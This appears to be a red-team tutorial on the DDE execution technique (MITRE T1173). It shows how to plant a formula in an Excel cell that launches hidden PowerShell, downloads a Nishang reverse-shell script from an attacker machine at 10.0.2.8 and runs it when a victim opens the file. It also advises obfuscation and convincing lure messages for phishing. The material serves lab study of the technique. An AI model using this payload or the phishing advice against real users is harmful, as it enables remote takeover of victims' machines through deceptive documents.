Dynamic Data Exchange

ID: T1173 Tactic: Execution

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplication's of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via phishing campaigns or hosted Web Content, avoiding the use of Visual Basic for Applications (VBA) macros. DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

So in this following example I will setup a simple DDE command that will use PowerShell to execute a Nishang Reverse Shell that will connect back to my attacker machine.

This techniques will use Excel as there is different procedures for the various Office Products but syntax is the same

As of 2017 Some products don't support DDE no more but Excel and Outlook do still by default

I will open a new excel spreadsheet and type the syntax into the formula box on the A1 cell

On the formula filed we will write the following syntax. If you receive a formula error it will usually Highlight where the error is located.

=cmd|'/c powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString(\"http://10.0.2.8:8080/Invoke-PowerShellTcp.ps1\");'!_xlbgnm.A1

With this we save and re-open the File. We will setup a Server and a Listener to download and execute our Script and to receive the connection back to our Attacking Machine.

Once the user open's the file an Update Warning will be shown on the upper section of the spreadsheet.

Once the Update is accepted a second prompt windows will be shown for trusting the external resource.

Click Yes and we see our connection ran succesfully. With the shell executed as well.

Demo:

Of course this is in it's most basic technique we can be able to obfuscate and throw other messages that can help it look more credible in terms on WHY the external resource needs to execute. As of today I know that these attacks are only available for Excel and Outlook Office 365, but they can still be used from anything lower from Office 2016.